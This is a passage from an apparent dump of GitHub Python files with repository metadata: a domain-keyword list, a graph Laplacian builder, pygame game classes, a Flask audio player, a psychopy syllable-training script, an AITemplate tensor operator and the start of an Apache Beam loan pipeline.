'paid',\n 'capital',\n 'wealth',\n\n # Investing\n\n 'invest',\n\n 'forex',\n 'binary',\n 'stock',\n 'equity',\n\n 'gold',\n 'metal',\n 'silver',\n\n 'trade',\n 'trading',\n\n 'crypto',\n 'bitcoin',\n 'coin',\n\n # Borrowing\n\n 'loan', \n 'credit',\n 'card',\n\n # Law\n\n 'law',\n 'legal',\n 'attorney',\n 'dui',\n 'criminal',\n\n\n\n\n # Business\n\n 'biz',\n 'business',\n 'sales',\n 'market',\n 'manage',\n 'work',\n 'leader',\n 'job',\n\n # Providers\n\n 'solution',\n 'service',\n 'consult',\n 'pro',\n 'strateg',\n 'entertain',\n 'studio',\n 'firm',\n 'special',\n 'advisor',\n\n 'guru',\n 'amateur',\n 'coach',\n \n 'vip',\n\n\n # Entities / Entity\n\n 'llc',\n 'inc',\n 'corp',\n 'partner',\n 'associat',\n 'club',\n 'foundation',\n 'group',\n 'company',\n 'team',\n 'gang',\n 'alliance',\n\n # Occupations\n\n 'plumb',\n 'floor',\n 'construct',\n 'contract',\n 'security', #security provider\n 'build',\n 'repair',\n\n 'glass',\n 'lumber',\n 'wood',\n\n\n # Creative / Arts\n\n 'music',\n 'dj',\n 'song',\n\n 'artist',\n\n 'photo',\n 'guitar',\n 'poetry',\n 'dance',\n 'film',\n\n 'visual',\n\n 'production',\n\n\n\n\n\n # Fashion\n\n 'fashion',\n 'outfit',\n 'cloth',\n\n\n\n\n\n # Health\n\n 'health', \n 'life',\n 'beauty',\n 'beauti',\n\n 'juice',\n 'smoothie',\n 'yogurt',\n\n 'organic',\n\n 'nutri',\n\n 'skin',\n 'face',\n 'facial',\n 'hair',\n 'energy',\n 'power',\n\n # Medical\n\n 'chiro',\n 'ortho',\n 'pedic',\n\n 'medic',\n\n 'doctor',\n 'therapy', \n 'massage',\n 'clinic',\n 'pharma',\n 'drug',\n\n 'vision',\n\n 'dental',\n 'dentist',\n\n # Natural\n\n 'natural',\n\n # Fitness\n\n 'fit',\n 'training',\n 'yoga',\n 'gym',\n\n\n\n\n\n # Sports / Gaming\n\n 'sport',\n\n 'golf',\n 'horse',\n \n 'bike',\n 'biking',\n 'cycle',\n \n 'race',\n 'racing',\n 'tennis',\n 'fish',\n 'kayak',\n 'diving',\n 'surf',\n 'ball',\n 'hiking',\n 'board',\n\n 'sail',\n 'marine',\n\n 'game',\n 'gaming',\n\n 'play',\n\n\n\n\n # Auto / Home / Boat\n\n 'car',\n 'auto', \n 'motor',\n\n 'estate', \n 'realty',\n 'realtor',\n\n 'home',\n 'land',\n 'property',\n 'propertie',\n 'prop',\n 'house',\n 'acre',\n 'villa',\n\n 'apt',\n 'apartment',\n \n 'rent',\n 'condo',\n 'shore',\n 'lake',\n 'forest',\n 'trail',\n\n 'north',\n 'south',\n 'east',\n 'west',\n\n 'boat',\n\n\n\n\n\n # Wedding\n\n 'wedding',\n 'marriage',\n 'marry',\n 'husband',\n 'wife',\n 'relationship',\n\n\n\n\n\n # Students\n\n 'student',\n 'college',\n 'school',\n 'university',\n 'education',\n 'tutor',\n 'learn',\n 'academ',\n 'instit',\n 'study',\n 'studies',\n\n\n\n\n # Lifestyle\n\n 'good',\n 'living',\n 'diy',\n 'freedom',\n 'well',\n\n 'country',\n 'southern',\n\n # Travel\n\n 'travel',\n 'tour',\n 'holiday',\n 'voyage',\n 'trip',\n 'island',\n 'vacation',\n \n 'flight',\n 'fly',\n\n 'backpack',\n \n # Family / Demographics\n\n 'family',\n\n 'mom',\n 'mum',\n 'mama',\n 'dad',\n 'parent',\n\n 'kid',\n 'child',\n 'baby',\n 'toddler',\n\n 'senior',\n 'elder',\n 'youth',\n 'young',\n\n 'girl',\n 'boy',\n 'guy',\n 'dude',\n\n 'sister',\n 'brother',\n\n # Outdoor\n \n 'outdoor',\n 'outside',\n 'camp',\n 'nature',\n\n # Food / Beverage\n\n 'food',\n 'cook',\n 'drink',\n\n 'coffee',\n 'pizza',\n 'beer',\n 'bbq', \n 'wine',\n 'grill',\n 'cake',\n 'burger',\n\n 'cafe',\n 'restaurant',\n\n 'eat',\n 'eating',\n 'eats',\n\n 'recipe',\n\n # Periodicals\n\n 'magazine',\n 'mag',\n 'podcast',\n 'news',\n 'journal',\n 'radio',\n 'times',\n 'press',\n 'post',\n 'wire',\n 'chronic',\n\n # Gender\n\n 'men',\n 'man',\n\n # Ministry\n\n 'ministry',\n 'faith',\n 'god',\n 
'church',\n 'scripture',\n 'christian',\n 'pray',\n 'temple',\n 'chapel',\n 'bible',\n\n # Activities\n\n 'garden',\n 'festiv',\n \n 'cinema',\n 'theater',\n 'theatre',\n\n 'salon',\n 'spa',\n\n # Weed\n\n '420',\n 'weed',\n 'marijuana',\n 'canna',\n 'cannabis',\n\n\n\n\n\n\n\n\n # Shopping\n\n 'mall',\n 'shop',\n 'retail',\n 'depot',\n 'store',\n 'mart',\n 'suppl',\n\n # Books\n\n 'book',\n 'fiction',\n 'publish',\n 'author',\n\n # Jewlry\n\n 'jewel',\n 'jewlry',\n 'jeweler',\n 'diamond',\n 'ring',\n 'necklace',\n\n # Products\n\n 'shoe',\n 'vape',\n\n 'kitchen',\n\n 'flower',\n\n\n\n\n # Web / Tech\n\n 'web',\n 'internet',\n 'app',\n 'tech',\n 'online',\n 'computer',\n 'pc',\n 'phone',\n 'software',\n\n # Providers\n\n 'host',\n 'seo',\n 'design',\n 'develop',\n\n # Platforms\n\n 'wiki',\n 'pedia',\n\n 'cms',\n 'blog',\n 'download',\n 'tube',\n 'image',\n 'video',\n 'forum',\n 'article',\n 'guide',\n 'movie',\n 'tv',\n 'comic',\n 'feed',\n 'chat',\n 'chan',\n 'report',\n 'gallery',\n 'anime',\n 'history',\n 'planet',\n 'buzz',\n\n 'wallpaper',\n 'background',\n\n 'hd',\n\n # Technologies\n\n 'linux', \n 'cloud',\n \n 'wordpress',\n 'wp',\n 'theme',\n\n 'magento', \n\n 'android',\n 'mobile',\n 'mobi',\n \n 'digi',\n\n 'google',\n 'youtube',\n 'facebook',\n\n\n\n\n\n # Accomodations\n\n 'inn',\n 'hotel',\n 'motel',\n 'booking',\n 'lodge',\n 'resort',\n 'suite',\n\n\n\n\n # Animals / Pets\n 'dog',\n 'pet',\n 'animal',\n\n\n\n\n\n\n\n\n\n\n\n\n\n # Places\n\n 'america',\n 'usa',\n\n 'canada',\n 'toronto',\n 'ontario',\n \n 'local',\n 'town',\n 'ville',\n 'village',\n\n 'japan',\n '-jp',\n\n 'ocean',\n 'coast',\n 'atlantic',\n 'pacific',\n 'beach',\n 'mountain',\n\n 'earth',\n\n # New York\n\n 'newyork',\n 'nyc',\n\n # Texas\n\n 'texas',\n\n 'austin',\n 'dallas',\n 'houston',\n\n # Philadelphia\n\n 'philly',\n 'philadelphia',\n\n # States\n\n 'michigan',\n 'indiana',\n 'california',\n 'florida',\n 'kansas',\n 'hawaii',\n\n # Cities\n\n 'atlanta',\n 'milwaukee',\n 'london',\n 'losangeles',\n 'chicago',\n 'seattle',\n 'denver',\n 'boston',\n 'memphis',\n\n 'detroit',\n\n\n\n\n\n\n\n\n\n\n\n\n # Commercial Intent\n\n 'coupon',\n 'deal',\n 'review',\n 'save',\n 'free',\n \n 'buy',\n 'sell',\n 'new',\n 'ship', #ing; (?)\n 'discount',\n 'custom',\n 'best',\n 'top',\n 'cheap',\n 'sale',\n 'bad',\n 'built',\n 'smart', # (?)\n 'perfect',\n 'dirty',\n 'clean',\n 'fast',\n\n 'relief',\n\n # Informational; traffic funnel.\n\n 'howto',\n 'problem',\n 'tips',\n 'answer',\n 'solution',\n 'help',\n 'about',\n 'list',\n 'ask',\n 'advice',\n 'support',\n 'faq',\n '101',\n\n # colors\n\n 'red',\n 'blue',\n 'orange',\n 'green',\n 'yellow',\n 'purple',\n 'black',\n 'white',\n\n # days of the week\n\n 'sunday',\n 'monday',\n 'tuesday',\n 'wednesday',\n 'thursday',\n 'friday',\n 'saturday',\n\n # time\n\n 'today', \n 'minute',\n 'future',\n 'now',\n\n 'daily',\n 'week',\n 'month',\n 'year',\n\n 'day',\n 'night',\n\n 'christmas',\n 'halloween',\n 'blackfriday',\n 'valentine',\n 'thanksgiving',\n\n # 5 w\n \n 'who',\n 'what',\n 'when',\n 'where',\n 'why',\n\n\n\n\n\n\n\n\n # adjectives\n\n 'vintage',\n 'classic',\n 'oriental',\n 'bold',\n 'big',\n 'small',\n 'luxury',\n 'rich',\n 'poor',\n 'advance',\n 'premium',\n 'premier',\n 'awesome',\n 'cool',\n '247',\n\n # uncat\n\n 'science',\n 'hydro',\n 'ology',\n 'chem',\n\n 'global',\n 'national',\n 'world',\n \n 'social',\n 'media',\n 'plus',\n \n 'industr',\n 'enterprise',\n \n 'system',\n 'hub',\n 'talk',\n 'center',\n 'centre',\n\n 'creat',\n 'connect',\n\n 
'essential',\n\n 'hello',\n\n 'love',\n\n\n]\n\n\"\"\"\ntrue_dict = []\nwith open('/home/johnny/dev/toolbox/dictionaries/words.txt', 'r') as f:\n for line in f:\n l = line.strip()\n if len(l) > 3:\n true_dict.append(l.lower())\n\"\"\"","repo_name":"hoytnix/spidey","sub_path":"search_engine/search/keys.py","file_name":"keys.py","file_ext":"py","file_size_in_byte":9878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38643457212","text":"from numpy import matlib as mat\nimport time\n\n# For testing - saves time to type in\nTEST_DATA = 'graph_data/test_2.edges'\n\nclass ReadEdges():\n \"\"\"\n Class for reading an edge file and processing into matricies\n\n args:\n filename (str): filename containing the edges\n \n attrs:\n edgeset_1 (arr(int)): set of verticies that connect to edgeset_2\n edgeset_2 (arr(int)): set of verticies that connect to edgeset_1\n adjacency (numpy.matrix): adjacency matrix of the graph\n degree (numpy.matrix): degree matrix of the graph\n laplacian (numpy.matrix): laplacian matrix of the graph\n \"\"\"\n def __init__(self, filename):\n \"\"\"\n Process the edges into two arrays of corresponding verticies\n ex.) [1,2,3] [4,1,4]\n 1-4\n 2-1\n 4-3 \n \"\"\"\n self.edgeset_1 = []\n self.edgeset_2 = []\n self.node_ids = []\n with open(filename, 'r') as edge_fl:\n for line in edge_fl:\n try:\n # some edge files have the first line list stats - can ignore\n x, y = line.split(' ')\n self.edgeset_1.append(x.strip('\\n'))\n self.edgeset_2.append(y.strip('\\n'))\n except ValueError:\n pass\n \n def print_edges(self):\n \"\"\"\n Prints the edges contained in edgeset_1 and edgeset_2\n \"\"\"\n for index in range(0, len(self.edgeset_1)):\n print(self.edgeset_1[index] + ' ' + self.edgeset_2[index])\n\n def __get_adjacency(self):\n \"\"\"\n Creates an adjacency matrix from edgesets\n * NOTE no. of unique edges in edgeset_1 might not be \n the same as no. 
of unique edges in edgeset_2\n * NOTE the total number of unique verticies has to be\n obtained through the union of the two unique edgelists\n \"\"\"\n self.node_ids = range(1, len(set.union(set(self.edgeset_1), set(self.edgeset_2)))+1)\n self.mat_dim = len(self.node_ids)\n self.adj_mat = mat.zeros((self.mat_dim, self.mat_dim))\n for edge_index in range(len(self.edgeset_1)):\n index_1 = int(self.edgeset_1[edge_index])-1\n index_2 = int(self.edgeset_2[edge_index])-1\n self.adj_mat[index_1, index_2] = 1\n self.adj_mat[index_2, index_1] = 1\n return self.adj_mat\n\n def __get_degree(self):\n \"\"\"\n Creates a Degree matrix from the adjacency matrix\n If the adjacency matrix has not yet been created,\n this method will create one\n *NOTE the __get_adjacency method should be called prior\n \"\"\"\n self.deg_mat = mat.zeros((self.mat_dim, self.mat_dim))\n for i in range(self.mat_dim):\n self.deg_mat[i, i] = self.adj_mat[:, i].sum()\n return self.deg_mat\n\n def __get_laplacian(self):\n \"\"\"\n Creates a laplacian matrix from the adjacency and Degree matrix\n *NOTE the __get_degree method should be called priors\n \"\"\"\n self.lap_mat = mat.zeros((self.mat_dim, self.mat_dim))\n for row in range(self.mat_dim):\n for col in range(row, self.mat_dim):\n self.lap_mat[row, col] = self.deg_mat[row, col] - self.adj_mat[row, col]\n self.lap_mat[col, row] = self.deg_mat[row, col] - self.adj_mat[row, col]\n return self.lap_mat\n\n def generate_matricies(self):\n \"\"\"\n Generates the adjacency, degree, and laplacian matrix in one method for timing\n \"\"\"\n self.__get_adjacency()\n self.__get_degree()\n self.__get_laplacian()\n\ndef main():\n # Test usage\n x = ReadEdges(TEST_DATA)\n start = time.time()\n x.generate_matricies()\n end = time.time()\n print(end-start)\n print(x.lap_mat)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"millotpg/Graph_Clustering","sub_path":"sequential/read_edges.py","file_name":"read_edges.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2592249476","text":"from game import *\n\nclass Player():\n def __init__(self, x, y):\n self.velocityX = 0\n self.velocityY = 0\n self.inventory = []\n self.image = pygame.image.load(os.path.join(sourceFileDir, \"character.png\"))\n self.speed = 10\n self.x = x #center x and y\n self.y = y\n self.width = self.image.get_width()\n self.height = self.image.get_height()\n self.angle = 0\n self.health = 100\n \n def updatePhysics(self):\n if self.velocityY > 0:\n self.velocityY -= friction\n self.velocityY = max(0, self.velocityY)\n elif self.velocityY < 0:\n self.velocityY += friction\n self.velocityY = min(0, self.velocityY)\n if self.velocityX > 0:\n self.velocityX -= friction\n self.velocityX = max(0, self.velocityX)\n elif self.velocityX < 0:\n self.velocityX += friction\n self.velocityX = min(0, self.velocityX)\n\n if self.velocityY > -self.speed and (keys[pygame.K_UP] or keys[pygame.K_w]):\n self.velocityY -= acceleration\n if self.velocityY < self.speed and (keys[pygame.K_DOWN] or keys[pygame.K_s]):\n self.velocityY += acceleration\n if self.velocityX < self.speed and (keys[pygame.K_RIGHT] or keys[pygame.K_d]):\n self.velocityX += acceleration\n if self.velocityX > -self.speed and (keys[pygame.K_LEFT] or keys[pygame.K_a]):\n self.velocityX -= acceleration\n\n print(self.x, self.y)\n\n '''for tile in tiles:\n if self.rect.colliderect(tile.rect):\n self.velocityX = 0\n self.velocityY = -20''' # boost pad, if set both to 0, 
becomes sand\n\n self.x += self.velocityX #move x, then check for collisions horizontally, then move y and check for collisions vertically\n\n for tile in tiles:\n if rectCollisionCheck(self, tile):\n if self.velocityX > 0:\n self.x = tile.x - self.width/2 - tile.width/2\n if self.velocityX < 0:\n self.x = tile.x + self.width/2 + tile.width/2\n\n self.y += self.velocityY\n\n for tile in tiles:\n if rectCollisionCheck(self, tile):\n if self.velocityY > 0:\n self.y = tile.y - self.height/2 - tile.height/2\n if self.velocityY < 0:\n self.y = tile.y + self.height/2 + tile.height/2\n\n def update(self):\n self.updatePhysics()\n\n newImage = pygame.transform.rotate(self.image, self.angle)\n newRect = newImage.get_rect(center = (centerX, centerY))\n gameDisplay.blit(newImage, newRect)\n \n def meleeAttack(self, angle, attackRange, damage):\n for enemy in enemies:\n if (enemy.x - player.x) ** 2 + (enemy.y - player.y) ** 2 < attackRange ** 2:\n enemy.health -= damage\n knockbackX = math.cos(math.radians(angle))\n knockbackY = -math.sin(math.radians(angle))\n enemy.velocityX = 7 * knockbackX\n enemy.velocityY = 7 * knockbackY\n\nclass Projectile():\n def __init__(self, x, y, directionX, directionY, speed):\n\n magnitude = math.sqrt(directionX ** 2 + directionY ** 2)\n directionX = directionX / magnitude\n directionY = directionY / magnitude\n\n self.angle = -math.atan2(directionY, directionX)\n self.image = pygame.transform.rotate(pygame.image.load(os.path.join(sourceFileDir,\"projectile.png\")), math.degrees(self.angle))\n self.speed = speed\n self.velocityX = self.speed * directionX\n self.velocityY = self.speed * directionY\n self.x = x #center x and y\n self.y = y\n self.width = self.image.get_width()\n self.height = self.image.get_height()\n projectiles.append(self)\n\n def update(self):\n self.x += self.velocityX\n self.y += self.velocityY\n for tile in tiles:\n if pointCollisionCheck(self, tile):\n projectiles.remove(self)\n #gameDisplay.blit(self.image, (centerX - player.rect.width/2 + (self.rect.centerx - player.rect.x), centerY - player.rect.height/2 + (self.rect.centery - player.rect.y)))\n #pygame.draw.circle(gameDisplay, (90, 0, 0), (int(centerX - player.rect.width/2 + (self.rect.centerx - player.rect.x)), int(centerY - player.rect.height/2 + (self.rect.centery - player.rect.y))), 5)\n gameDisplay.blit(self.image, (centerX + (self.x - player.x) - self.width/2, centerY + (self.y - player.y) - self.height/2))\n\n\nclass Tile():\n def __init__(self, x, y):\n self.image = pygame.image.load(os.path.join(sourceFileDir,\"tile.png\"))\n self.x = x\n self.y = y\n self.width = tileSize\n self.height = tileSize\n tiles.append(self)\n def update(self):\n gameDisplay.blit(self.image, (centerX + (self.x - player.x) - self.width/2, centerY + (self.y - player.y) - self.height/2))\n\n '''displayX = centerX + (self. 
rect.x - player.rect.x)\n        displayY = centerY + (self.rect.y - player.rect.y)\n        if displayWidth > displayX > 0 and displayHeight > displayY > 0:\n            gameDisplay.blit(self.image, (displayX, displayY))'''\n\nclass Enemy():\n    def __init__(self, x, y):\n        self.image = pygame.image.load(os.path.join(sourceFileDir,\"enemy.png\"))\n        self.x = x\n        self.y = y\n        self.width = self.image.get_width()\n        self.height = self.image.get_height()\n        self.velocityX = 0\n        self.velocityY = 0\n        self.speed = 3\n        self.angle = 0\n        self.moveMode = \"idle\"\n        self.idleTimer = 0\n        self.health = 50\n        self.directionX = 0\n        self.directionY = 0\n        enemies.append(self)\n\n    def updatePhysics(self):\n        if self.velocityY > 0:\n            self.velocityY -= friction\n            self.velocityY = max(0, self.velocityY)\n        elif self.velocityY < 0:\n            self.velocityY += friction\n            self.velocityY = min(0, self.velocityY)\n        if self.velocityX > 0:\n            self.velocityX -= friction\n            self.velocityX = max(0, self.velocityX)\n        elif self.velocityX < 0:\n            self.velocityX += friction\n            self.velocityX = min(0, self.velocityX)\n\n        if -self.speed < self.velocityX < self.speed and -self.speed < self.velocityY < self.speed:\n            self.velocityX += self.directionX * acceleration\n            self.velocityY += self.directionY * acceleration\n\n        self.x += self.velocityX #move x, then check for collisions horizontally, then move y and check for collisions vertically\n\n        for tile in tiles:\n            if rectCollisionCheck(self, tile):\n                if self.velocityX > 0:\n                    self.x = tile.x - self.width/2 - tile.width/2\n                if self.velocityX < 0:\n                    self.x = tile.x + self.width/2 + tile.width/2\n\n        self.y += self.velocityY\n\n        for tile in tiles:\n            if rectCollisionCheck(self, tile):\n                if self.velocityY > 0:\n                    self.y = tile.y - self.height/2 - tile.height/2\n                if self.velocityY < 0:\n                    self.y = tile.y + self.height/2 + tile.height/2\n\n    def update(self):\n        self.updatePhysics()\n\n        if pygame.time.get_ticks() >= self.idleTimer:\n            self.idleTimer += 3000\n            if self.directionX == 0 and self.directionY == 0:\n                self.directionX = random.randint(-1, 1)\n                self.directionY = random.randint(-1, 1)\n            else:\n                self.directionX = 0\n                self.directionY = 0\n\n        self.angle = -math.degrees(math.atan2(self.velocityY, self.velocityX))\n        newImage = pygame.transform.rotate(self.image, self.angle)\n        gameDisplay.blit(newImage, (centerX + (self.x - player.x) - self.width/2, centerY + (self.y - player.y) - self.height/2))\n","repo_name":"P4GAN/tileRPG","sub_path":"gameObjects.py","file_name":"gameObjects.py","file_ext":"py","file_size_in_byte":7922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43446613654","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask, jsonify\nimport os, logging, json\nfrom logging.handlers import RotatingFileHandler\n\napp = Flask(__name__)\n\n# Load the media access keys\nwith open('media/player.json') as outfile:\n    medias = json.load(outfile)\n\n@app.route('/')\ndef accueil():\n    message = \"Player at your service...\"\n    info(message)\n    return jsonify(message)\n\n@app.route('/play/<keyFile>')\ndef play(keyFile):\n    message = \"Play...\"\n    if os.system(\"pgrep --list-name audacious\") == 0:\n        if keyFile == \"0\":\n            command = f\"audacious --stop\"\n            iret = os.system(command)\n            message = f\"play {iret} {command}\"\n        elif keyFile == \"1\":\n            command = f\"audacious --pause\"\n            iret = os.system(command)\n            message = f\"play {iret} {command}\"\n        elif keyFile == \"2\":\n            command = f\"audacious --play\"\n            iret = os.system(command)\n            message = f\"play {iret} {command}\"\n        elif medias[\"drums\"][keyFile] is not None:\n            filePath = os.path.join(app.root_path, 'media', medias[\"drums\"][keyFile])\n            if os.path.exists(filePath):\n                command = f\"audacious {filePath}\"\n                iret = os.system(command)\n                message = f\"play {iret} {command}\"\n                if iret == 0:\n                    info(message)\n                else:\n                    error(message)\n            else:\n                message = f\"{filePath} not found\"\n                error(message)\n        else:\n            message = f\"key [{keyFile}] not found\"\n    else:\n        message = f\"Audacious is not running\"\n        error(message)\n    \n\n    return jsonify(message)\n\n@app.route('/stop')\ndef stop():\n    message = \"Stop..\"\n    if os.system(\"pgrep --list-name audacious\") == 0:\n        command = f\"audacious --stop\"\n        iret = os.system(command)\n        message = f\"stop {iret}\"\n        if iret == 0:\n            info(message)\n        else:\n            error(message)\n    else:\n        message = f\"Audacious is not running\"\n        error(message)\n\n    return jsonify(message)\n\ndef info(message):\n    app.logger.info(message)\ndef error(message):\n    app.logger.error(message)\n\n# Unit tests\nif __name__ == '__main__':\n    info(\"Player starting...\")\n    app.run(host='0.0.0.0', port=8053, debug=True)\n","repo_name":"pbillerot/player-flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16165572524","text":"# training.py\r\n# This is the training script which will be presented to the participant before they sleep\r\n# or remain awake\r\n#\r\n# TODO\r\n\r\n# Libraries - these seem fine and should not need altering.\r\nfrom psychopy import visual, event, core, misc, data, gui, sound\r\n\r\n# Participant needs to press y to continue.\r\ndef ready_cont():\r\n    stim_win.flip()\r\n    user_response=None\r\n    while user_response==None:\r\n        allKeys=event.waitKeys()\r\n        for thisKey in allKeys:\r\n            if thisKey=='y':\r\n                user_response=1\r\n            if thisKey=='q':\r\n                core.quit()\r\n\r\n# Metronome function - This plays the metronome; the timing can also be altered here.\r\n# The timing required needs to be passed to metronome function.\r\n#music = pyglet.resource.media('klack.ogg', streaming=False)\r\nmusic = sound.Sound(900,secs=0.01) # Just temporary\r\ndef metronome(met_time):\r\n    music.play()\r\n    core.wait(met_time)\r\n    music.play()\r\n    core.wait(met_time)\r\n    music.play()\r\n    core.wait(met_time)\r\n    music.play()\r\n    core.wait(met_time)\r\n\r\n# The metronome alone so the participant can become familiar with\r\n# the speed (no stimuli).\r\ndef metronome_alone():\r\n    stim_win.flip()\r\n    metronome(cvc_slow_rate)\r\n    metronome(cvc_faster_rate)\r\n    metronome(cvc_faster_rate)\r\n    metronome(cvc_faster_rate)\r\n\r\n# Variables\r\nwelcome_message = \"\"\"Welcome to the training session! You will see four syllables in a row. Please read the entire row out loud 4 times in time to the metronome and try to say one syllable per beat. The first time will be slow, and the next 3 repetitions will be a little faster. Try to read as fluently as possible. 
Do not worry if you make mistakes, just keep in time with the beat.\r\nPress y now to hear the speed of the metronome.\"\"\"\r\nsample_welcome = \"\"\"The following will be a practice session to familiarize you with the sequences (press y to continue)\"\"\"\r\nsample_goodbye = \"\"\"The sample has ended, please press y if you are ready for the real session\"\"\"\r\nthank_you = \"\"\"The training session is complete,\r\nPlease inform a researcher you have finished.\r\nThank you.\"\"\"\r\nmetronome_alone_message = \"\"\"Playing the metronome...\"\"\"\r\n\r\n# cvc rates\r\ncvc_slow_rate = 1.0\r\n# A cvc every 395ms as in Warker et al. (2008)\r\ncvc_faster_rate = 0.395\r\n# interval between each sequence\r\nstim_interval = 1.0\r\nbetween_tests_interval = 2.0\r\n\r\n# Stimuli variables - These are the non counterbalanced stimuli.\r\nsample_stim = ['haf gak mang san',\r\n'kis mig hing fin',\r\n'sak haf nam gang']\r\n\r\nreal_stim = ['naf hang sag kam',\r\n'kin fis ming hig',\r\n'gaf ham sang kan',\r\n'ning fis hig kim',\r\n'nang hag maf sak',\r\n'hig kim fis ning',\r\n'kaf han mang sag',\r\n'hin mig kis fing',\r\n'gak saf ham nang',\r\n'nim fis ging hik',\r\n'sam kan haf gang',\r\n'hig nis kim fing',\r\n'naf mag hak sang',\r\n'hik nis fim ging',\r\n'hang saf nam kag',\r\n'hin fis ming kig',\r\n'hang gaf sam nak',\r\n'mig king hin fis',\r\n'haf sang mak nag',\r\n'kin mis hing fig',\r\n'man sag kaf hang',\r\n'ging fis hik nim',\r\n'sam gaf kan hang',\r\n'ming fig kis hin',\r\n'gak san haf mang',\r\n'his fin kim ging',\r\n'mak haf nang sag',\r\n'fin kim gis hing',\r\n'kang saf han gam',\r\n'gim fin king his',\r\n'mag sang kaf han',\r\n'mik nis hing fig',\r\n'saf han kang gam',\r\n'ging hin fis kim',\r\n'man kag haf sang',\r\n'mig hik ning fis',\r\n'nag hak mang saf',\r\n'kin hing fim gis',\r\n'san kaf mag hang',\r\n'him king gis fin',\r\n'kang ham naf sag',\r\n'hing nim fis kig',\r\n'saf nak gam hang',\r\n'hik mig fing nis',\r\n'nag hak maf sang',\r\n'fis hik nim ging',\r\n'sag kam haf nang',\r\n'fing him nis gik']\r\n\r\n# Setting up the screen.\r\nstim_win = visual.Window(monitor = \"testMonitor\", units ='norm', fullscr=True)\r\nmessage = visual.TextStim(stim_win, text = welcome_message, font = \"Arial\")\r\nmessage.setAutoDraw(True)\r\nready_cont()\r\nstim_win.flip()\r\n\r\n# The metronome so participants know what it's like.\r\n# Hmm allow participant to repeat? 
- Not really fair if\r\n# some participants run it more than others and pronounce\r\n# cvcs better due to familiarity with the beat.\r\nmessage.setText(metronome_alone_message)\r\nmetronome_alone()\r\ncore.wait(stim_interval)\r\nstim_win.flip()\r\n\r\n# Welcome the participant.\r\nmessage.setText(sample_welcome)\r\nready_cont()\r\n\r\n# The sample loop\r\nstim_win.flip()\r\nfor i in range(len(sample_stim)):\r\n message.setText(sample_stim[i])\r\n stim_win.flip()\r\n core.wait(stim_interval)\r\n metronome(cvc_slow_rate)\r\n metronome(cvc_faster_rate)\r\n metronome(cvc_faster_rate)\r\n metronome(cvc_faster_rate)\r\n core.wait(stim_interval)\r\n\r\n# Ask participant if they are ready to continue\r\nmessage.setText(sample_goodbye)\r\nready_cont()\r\n\r\n# The real stimuli loop\r\nstim_win.flip()\r\nfor i in range(len(real_stim)):\r\n message.setText(real_stim[i])\r\n stim_win.flip()\r\n core.wait(stim_interval)\r\n metronome(cvc_slow_rate)\r\n metronome(cvc_faster_rate)\r\n metronome(cvc_faster_rate)\r\n metronome(cvc_faster_rate)\r\n core.wait(stim_interval)\r\n\r\n# Saying goodbye\r\nstim_win.flip()\r\nmessage.setText(thank_you)\r\nready_cont()\r\ncore.wait(stim_interval)\r\n\r\n#cleanup\r\nstim_win.close()\r\ncore.quit()\r\n","repo_name":"vivithemage/phonotactic-constraints-presentation-software","sub_path":"training/saf-fis/training-saf-fis-2.py","file_name":"training-saf-fis-2.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19818439090","text":"from typing import List\n\nfrom aitemplate import backend\nfrom aitemplate.backend import registry\nfrom aitemplate.compiler.base import IntImm, IntVar, Operator, Tensor\nfrom aitemplate.compiler.dtype import get_dtype_size\n\n\nclass full(Operator):\n \"\"\"\n Creates a tensor of a given `shape` and `dtype` filled\n with the specified `fill_value` (float scalar).\n\n Args:\n shape (int or IntVar or List[IntVar]): the shape of the output Tensor.\n fill_value (int or float): the value to fill the output Tensor with.\n dtype (str): the dtype of the output Tensor.\n\n Returns:\n Tensor: a tensor of `shape` and `dtype` filled with `fill_value`.\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n\n self._attrs[\"op\"] = \"full\"\n self._attrs[\"has_profiler\"] = False\n\n def __call__(\n self,\n shape: List[IntVar],\n fill_value: float,\n dtype: str = \"float16\",\n ) -> Tensor:\n if isinstance(shape, (int, IntVar)):\n shape = [shape]\n if not isinstance(shape, (list, tuple)):\n raise TypeError(f\"shape must be List[IntVar], but got {shape}.\")\n shape = list(shape)\n static_shape = all([isinstance(s, (int, IntImm)) for s in shape])\n\n if not isinstance(fill_value, (int, float)):\n raise TypeError(f\"fill_value must be a scalar, but got {fill_value}.\")\n fill_value = float(fill_value)\n\n # validation inside\n get_dtype_size(dtype)\n\n self._attrs[\"inputs\"] = []\n self._attrs[\"fill_value\"] = fill_value\n\n self._set_depth()\n output = Tensor(\n shape, src_ops={self}, dtype=dtype, skip_constant_folding=not static_shape\n )\n self._attrs[\"outputs\"] = [output]\n return output\n\n def gen_function(self) -> str:\n target = backend.target.Target.current()\n func_key = f\"{target.name()}.{self._attrs['op']}.gen_function\"\n func = registry.get(func_key)\n return 
func(self._attrs)\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/compiler/ops/tensor/full.py","file_name":"full.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"3362705722","text":"import apache_beam as beam\n\n\ndef split_row(element):\n return element.split(',')\n\n\ndef remove_spaces(element): # Note: Some column values start with a space\n element[6] = element[6].replace(\" \", \"\")\n element[8] = element[8].replace(\" \", \"\")\n return element\n\n\ndef filter_medical_loans(element):\n return element[5] == \"Medical Loan\"\n\n\ndef add_points_column(element): # penalty points\n element.append(0) # default value for no. of late_payments\n return element\n\n\ndef late_payments(element):\n if element[8] > element[6]:\n element[9] += 1 # 1 point for each penalty\n return element\n\n\ndef get_select_elements(record):\n selected_elements = (record[0], record[9]) # convert to tuple, in order to do GroupBy later\n return selected_elements\n\n\nclass Counting(beam.DoFn):\n\n def process(self, element):\n (key, values) = element\n return [(key, sum(values))]\n\n\ndef filter_defaulters(element): # 3 or more late payments\n (key, 